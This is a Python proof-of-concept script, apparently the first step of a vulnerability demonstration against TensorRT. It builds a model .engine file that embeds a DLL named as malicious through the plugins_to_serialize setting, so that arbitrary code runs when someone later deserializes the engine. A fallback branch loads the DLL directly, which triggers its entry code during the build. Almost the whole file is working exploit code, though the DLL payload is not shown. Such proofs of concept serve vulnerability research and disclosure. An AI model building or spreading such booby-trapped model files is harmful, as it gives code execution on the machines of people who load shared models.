"""
TensorRT ACE PoC - Step 1: Build a malicious .engine file with an embedded plugin DLL.

This script:
  1. Creates a simple identity network using TensorRT's network API.
  2. Serializes the malicious plugin DLL into the engine file via
     ``IBuilderConfig.plugins_to_serialize``.
  3. Saves the resulting .engine file.

The .engine file will contain the embedded DLL, which executes arbitrary
code when the engine is deserialized by TensorRT.
"""
import os
import sys

import tensorrt as trt

# Directory containing this script; made absolute so that paths do not depend
# on how the script was invoked (dirname of a bare "script.py" is "").
_HERE = os.path.dirname(os.path.abspath(__file__))

# Shape of the single network input; the value is arbitrary for this PoC.
_INPUT_SHAPE = (1, 3, 32, 32)
# Builder workspace memory-pool limit (1 MiB).
_WORKSPACE_BYTES = 1 << 20


def _make_identity_network(builder):
    """Create a network that maps tensor "input" to "output" through one identity layer.

    Args:
        builder: a ``trt.Builder`` used to create the network.

    Returns:
        The populated network definition, or ``None`` if
        ``builder.create_network`` returned ``None``.
    """
    network = builder.create_network(
        1 << int(trt.NetworkDefinitionCreationFlag.EXPLICIT_BATCH)
    )
    if network is None:
        return None
    input_tensor = network.add_input("input", trt.float32, _INPUT_SHAPE)
    output_tensor = network.add_identity(input_tensor).get_output(0)
    output_tensor.name = "output"
    network.mark_output(output_tensor)
    return network


def _make_builder_config(builder, plugin_path):
    """Create a builder config that asks TensorRT to embed *plugin_path* in the engine.

    Args:
        builder: the ``trt.Builder`` that owns the config.
        plugin_path: filesystem path of the plugin library to serialize.

    Returns:
        The configured ``IBuilderConfig``.
    """
    config = builder.create_builder_config()
    config.set_memory_pool_limit(trt.MemoryPoolType.WORKSPACE, _WORKSPACE_BYTES)
    # KEY STEP: TensorRT reads this file from disk and stores it in the engine.
    config.plugins_to_serialize = [plugin_path]
    return config


def build_malicious_engine():
    """Build an identity-network engine with the plugin DLL embedded and save it.

    Reads ``malicious_plugin.dll`` from the script directory and writes
    ``malicious_model.engine`` next to it. If the first build fails, the
    plugin is loaded into the builder's plugin registry and the build is
    retried once with a fresh builder.

    Returns:
        True if the engine was built and written, False otherwise.
    """
    plugin_dll = os.path.join(_HERE, "malicious_plugin.dll")
    engine_file = os.path.join(_HERE, "malicious_model.engine")

    if not os.path.exists(plugin_dll):
        print(f"ERROR: Plugin DLL not found: {plugin_dll}")
        return False

    logger = trt.Logger(trt.Logger.VERBOSE)

    builder = trt.Builder(logger)
    if builder is None:
        print("ERROR: Failed to create builder")
        return False

    # NOTE: We skip load_library() - just embed the DLL directly.
    # TensorRT reads the file from disk for plugins_to_serialize.
    dll_size = os.path.getsize(plugin_dll)
    print(f"[*] Plugin DLL: {plugin_dll} ({dll_size} bytes)")

    network = _make_identity_network(builder)
    if network is None:
        print("ERROR: Failed to create network")
        return False
    print("[*] Simple identity network created")

    print(f"[*] Setting plugins_to_serialize: {plugin_dll}")
    config = _make_builder_config(builder, plugin_dll)

    print("[*] Building engine (this may take a moment)...")
    serialized_engine = builder.build_serialized_network(network, config)

    if serialized_engine is None:
        print("ERROR: Failed to build serialized engine")
        print("[*] Trying approach 2: load_library first, then serialize...")

        # Approach 2: load the library first (this triggers DllMain during build).
        registry = builder.get_plugin_registry()
        handle = registry.load_library(plugin_dll)
        print(f"[*] load_library result: {handle}")

        # Rebuild from scratch with a fresh builder. Guard every step so that
        # a None here ends in the failure message rather than an AttributeError.
        retry_builder = trt.Builder(logger)
        retry_network = (
            _make_identity_network(retry_builder) if retry_builder is not None else None
        )
        if retry_network is not None:
            serialized_engine = retry_builder.build_serialized_network(
                retry_network, _make_builder_config(retry_builder, plugin_dll)
            )
        if serialized_engine is None:
            print("ERROR: Still failed to build engine")
            return False

    engine_size = serialized_engine.nbytes
    print(f"[+] Engine built successfully! Size: {engine_size} bytes")

    # Heuristic only: a tiny identity network should serialize to far fewer
    # bytes than the DLL, so an engine larger than the DLL suggests (but does
    # not prove) that the DLL bytes were embedded.
    print(f"[*] Plugin DLL size: {dll_size} bytes")
    if engine_size > dll_size:
        print("[+] Engine is larger than DLL - DLL likely embedded!")
    else:
        print("[-] Engine seems too small - DLL might not be embedded")

    with open(engine_file, "wb") as f:
        f.write(bytes(serialized_engine))
    print(f"[+] Malicious engine saved to: {engine_file}")
    return True


if __name__ == "__main__":
    # Remove any proof file left by a previous run so a fresh one is meaningful.
    proof = os.path.join(_HERE, "PWNED.txt")
    if os.path.exists(proof):
        os.remove(proof)

    success = build_malicious_engine()
    if success:
        print("\n[+] STEP 1 COMPLETE: Malicious engine built.")
        print("[*] Next: Run load_malicious_engine.py to test ACE")
    else:
        print("\n[-] STEP 1 FAILED")
    sys.exit(0 if success else 1)